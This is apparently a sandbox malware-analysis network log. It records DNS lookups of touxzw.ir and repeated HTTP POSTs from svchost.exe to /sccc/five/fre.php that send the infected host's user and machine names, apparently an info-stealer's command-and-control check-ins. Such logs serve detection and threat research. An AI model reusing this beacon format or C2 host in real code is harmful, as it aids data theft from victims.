Feb 27, 2025 23:42:39.257699013 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:39.262829065 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:39.262921095 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:39.264647007 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:39.269705057 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:39.269759893 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:39.274919033 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:40.042617083 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:40.042728901 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:40.043283939 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:40.043346882 CET	49967	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:40.049125910 CET	80	49967	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.210576057 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.215707064 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.215809107 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.218130112 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.224682093 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.224735975 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.230331898 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.855597973 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.856250048 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:41.856340885 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.856383085 CET	49982	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:41.861447096 CET	80	49982	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.007882118 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.013205051 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.013298988 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.016216040 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.021461010 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.021533012 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.026573896 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.767069101 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.767205000 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.767882109 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:43.767946005 CET	49993	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:43.772310019 CET	80	49993	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:44.936772108 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:44.942095995 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:44.942210913 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:44.945250034 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:44.950377941 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:44.950480938 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:44.955581903 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:45.743223906 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:45.743356943 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:45.743837118 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:45.743892908 CET	50006	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:45.748439074 CET	80	50006	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:46.917597055 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:46.922790051 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:46.924907923 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:46.927897930 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:46.933053017 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:46.933140039 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:46.938262939 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:47.553442001 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:47.553709030 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:47.553972960 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:47.554147959 CET	50020	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:47.559067011 CET	80	50020	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:48.702260017 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:48.707596064 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:48.707696915 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:48.709428072 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:48.714512110 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:48.714574099 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:48.719640970 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:49.501873016 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:49.501980066 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:49.503334045 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:49.503376961 CET	50031	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:49.507118940 CET	80	50031	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:50.653480053 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:50.658638000 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:50.658737898 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:50.660828114 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:50.665923119 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:50.665973902 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:50.670949936 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:51.442588091 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:51.442687988 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:51.442996025 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:51.443051100 CET	50044	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:51.447774887 CET	80	50044	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:52.588416100 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:52.593756914 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:52.593852997 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:52.595768929 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:52.600878954 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:52.600949049 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:52.606039047 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:53.390496969 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:53.390655041 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:53.391813040 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:53.391874075 CET	50052	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:53.395831108 CET	80	50052	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:54.543055058 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:54.548368931 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:54.548476934 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:54.550208092 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:54.555304050 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:54.555373907 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:54.560462952 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:55.315660954 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:55.315763950 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:55.316446066 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:55.316504955 CET	50053	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:55.320842981 CET	80	50053	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:56.490973949 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:56.498953104 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:56.499160051 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:56.501636982 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:56.506829023 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:56.506891012 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:56.512269974 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:57.248605013 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:57.248846054 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:57.248919010 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:57.248995066 CET	50054	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:57.253974915 CET	80	50054	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:58.397469997 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:58.402631044 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:58.402705908 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:58.404495001 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:58.409600973 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:58.409662962 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:58.415508032 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:59.189064980 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:59.189274073 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:59.189363003 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:59.189457893 CET	50055	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:59.194582939 CET	80	50055	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:00.589015007 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:00.594381094 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:00.594449997 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:00.597058058 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:00.602119923 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:00.602247953 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:00.607433081 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:01.243894100 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:01.244050980 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:01.245063066 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:01.245125055 CET	50056	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:01.249222994 CET	80	50056	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:02.403214931 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:02.408483028 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:02.410625935 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:02.412352085 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:02.417507887 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:02.418607950 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:02.423624039 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:03.137861967 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:03.138242006 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:03.138293028 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:03.147010088 CET	50057	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:03.152067900 CET	80	50057	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:04.434533119 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:04.439740896 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:04.439847946 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:04.442754984 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:04.447832108 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:04.447901011 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:04.452949047 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:05.096396923 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:05.096643925 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:05.097188950 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:05.097259045 CET	50058	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:05.102063894 CET	80	50058	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:06.261240005 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:06.266709089 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:06.266803980 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:06.268534899 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:06.273593903 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:06.273683071 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:06.278846025 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:07.012559891 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:07.012697935 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:07.013525009 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:07.013580084 CET	50059	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:07.017817020 CET	80	50059	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.167258978 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.172446966 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.172533035 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.174295902 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.180320024 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.180377007 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.186423063 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.907119989 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.907715082 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:08.907910109 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.908143044 CET	50060	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:08.913233042 CET	80	50060	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.070950985 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.076209068 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.076333046 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.078201056 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.083311081 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.083395958 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.088458061 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.857620001 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.857748985 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.858526945 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:10.858591080 CET	50061	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:10.862859011 CET	80	50061	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.009967089 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.015216112 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.015295029 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.017047882 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.023279905 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.023349047 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.028413057 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.799716949 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.800122976 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:12.800249100 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.800273895 CET	50062	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:12.805567026 CET	80	50062	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:13.969824076 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:13.974955082 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:13.975043058 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:13.977494001 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:13.982496023 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:13.982660055 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:13.987744093 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:14.728152990 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:14.728915930 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:14.729028940 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:14.729335070 CET	50063	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:14.734258890 CET	80	50063	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:15.908293009 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:15.913605928 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:15.913719893 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:15.916953087 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:15.922202110 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:15.922272921 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:15.927505970 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:16.641885996 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:16.641976118 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:16.642122030 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:16.642122030 CET	50064	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:16.647237062 CET	80	50064	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:17.796490908 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:17.801945925 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:17.802104950 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:17.803793907 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:17.811896086 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:17.811981916 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:17.819755077 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:18.623796940 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:18.623939037 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:18.624069929 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:18.624130964 CET	50065	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:18.629040956 CET	80	50065	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:19.811105013 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:19.816440105 CET	80	50066	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:19.818758965 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:19.821134090 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:19.826195002 CET	80	50066	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:19.826738119 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:19.831784964 CET	80	50066	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:20.626636982 CET	80	50066	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:20.626741886 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:20.627790928 CET	80	50066	104.21.64.1	192.168.2.4
Feb 27, 2025 23:43:20.627861023 CET	50066	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:43:20.631802082 CET	80	50066	104.21.64.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 27, 2025 23:41:18.197148085 CET	58791	53	192.168.2.4	1.1.1.1
Feb 27, 2025 23:41:18.282279968 CET	53	58791	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 27, 2025 23:41:18.197148085 CET	192.168.2.4	1.1.1.1	0x7025	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 27, 2025 23:41:18.282279968 CET	1.1.1.1	192.168.2.4	0x7025	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:18.343230963 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 176 Connection: close
Feb 27, 2025 23:41:18.348275900 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones899552JONES-PCk0FDD42EE188E931437F4FBE2CvgPl5
Feb 27, 2025 23:41:19.121046066 CET	812	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MtEPqZ1%2BG%2BzGYYkxdyVqLIefDdE56RFCKUvhm68mwXqcG%2BhToWWS4gmNVNr5KBtOjWrBX3CSLlfYE5BhkRhWRuS3CmMEi2AZytq4YNSkEOzxngzzHRf0kIZI00g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bae7c288272c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:20.259622097 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 176 Connection: close
Feb 27, 2025 23:41:20.264636993 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones899552JONES-PC+0FDD42EE188E931437F4FBE2CP19jT
Feb 27, 2025 23:41:21.009768963 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:20 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dar%2FsKFSdF7NXjJ6gDQqDLSlOMeT%2FErNFndEqw1UxYKOTLLb2sfXYMGCm07S%2FjJYccuIvV%2F1x1M7hLYCT4VAlGB2KGMfcy2Il%2B1%2F7ny37DggihHpLeSrYBCNokA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bae884b3c42b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:21.077778101 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
